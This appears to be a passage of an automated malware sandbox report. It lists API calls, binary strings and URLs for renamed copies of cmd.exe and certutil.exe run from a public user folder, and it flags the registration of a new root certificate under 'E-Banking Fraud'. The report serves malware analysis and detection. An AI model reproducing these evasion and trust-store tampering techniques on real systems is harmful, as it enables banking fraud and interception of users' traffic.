Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD868404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF7FD868404
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD826374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,7_2_00007FF7FD826374
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD822358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,7_2_00007FF7FD822358
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1994913771.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1998130841.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2005107794.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2007392598.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.2008335788.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.2007679556.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.2008750907.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.2010642748.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1994913771.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1998130841.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2005107794.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2007392598.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.2008335788.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.2007679556.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.2008750907.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.2010642748.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF6EB182978
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF6EB197B4C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF6EB171560
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF6EB1735B8
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF6EB182978
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6EB197B4C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF6EB171560
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF6EB1735B8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD815E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF7FD815E58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD871B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF7FD871B04
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8719F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF7FD8719F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF7FD81DBC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD853674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF7FD853674
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF7FD81D4A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7DD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7DD440
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF7FD81B3D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8710C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF7FD8710C4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD873100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF7FD873100
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD876F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF7FD876F80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD80C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF7FD80C6F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD87234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF7FD87234C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF6EB182978
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF6EB197B4C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF6EB171560
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF6EB1735B8
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF6EB182978
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF6EB197B4C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF6EB171560
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF6EB1735B8
Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
Source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
Source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token

E-Banking Fraud

barindex
Registers a new ROOT certificate
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8460BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore,7_2_00007FF7FD8460BC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF7FD7BF9B8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF7FD7CFC20
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8698B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF7FD8698B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD82184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF7FD82184C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF7FD83342C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8693A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF7FD8693A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD866EA8 NCryptImportKey,#360,7_2_00007FF7FD866EA8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF7FD830EF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD820F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF7FD820F58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF7FD81EA7C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF7FD7F29A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF7FD7F25E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF7FD86A740
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD82E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF7FD82E1F8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB19BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00007FF6EB19BCF0
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_00007FF6EB1888C0
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB188114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00007FF6EB188114
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB187FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,4_2_00007FF6EB187FF8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1A1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB173D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,4_2_00007FF6EB173D94
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB18898C NtQueryInformationToken,4_2_00007FF6EB18898C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1889E4 NtQueryInformationToken,NtQueryInformationToken,4_2_00007FF6EB1889E4
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB19BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,6_2_00007FF6EB19BCF0
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB1888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,6_2_00007FF6EB1888C0
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB188114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,6_2_00007FF6EB188114
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB187FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,6_2_00007FF6EB187FF8
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB1A1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,6_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB173D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,6_2_00007FF6EB173D94
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB18898C NtQueryInformationToken,6_2_00007FF6EB18898C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB1889E4 NtQueryInformationToken,NtQueryInformationToken,6_2_00007FF6EB1889E4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD88C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,7_2_00007FF7FD88C964
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB188114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,10_2_00007FF6EB188114
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB187FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError,10_2_00007FF6EB187FF8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB19BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,10_2_00007FF6EB19BCF0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB1888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,10_2_00007FF6EB1888C0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB1A1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,10_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB173D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,10_2_00007FF6EB173D94
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB18898C NtQueryInformationToken,10_2_00007FF6EB18898C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB1889E4 NtQueryInformationToken,NtQueryInformationToken,10_2_00007FF6EB1889E4
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB188114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF6EB188114
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB187FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF6EB187FF8
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB19BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF6EB19BCF0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF6EB1888C0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1A1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB173D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF6EB173D94
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB18898C NtQueryInformationToken,11_2_00007FF6EB18898C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1889E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF6EB1889E4
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB175240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,4_2_00007FF6EB175240
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB184224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,4_2_00007FF6EB184224
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1837D84_2_00007FF6EB1837D8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB180A6C4_2_00007FF6EB180A6C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB17AA544_2_00007FF6EB17AA54
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1855544_2_00007FF6EB185554
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1842244_2_00007FF6EB184224
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB172C484_2_00007FF6EB172C48
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1878544_2_00007FF6EB187854
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB19AC4C4_2_00007FF6EB19AC4C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1718844_2_00007FF6EB171884
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB17B0D84_2_00007FF6EB17B0D8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1818D44_2_00007FF6EB1818D4
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB177D304_2_00007FF6EB177D30
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1785104_2_00007FF6EB178510
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB175B704_2_00007FF6EB175B70
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB179B504_2_00007FF6EB179B50
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB173F904_2_00007FF6EB173F90
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB176BE04_2_00007FF6EB176BE0
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB19AFBC4_2_00007FF6EB19AFBC
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1734104_2_00007FF6EB173410
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1752404_2_00007FF6EB175240
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1776504_2_00007FF6EB177650
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB17D2504_2_00007FF6EB17D250
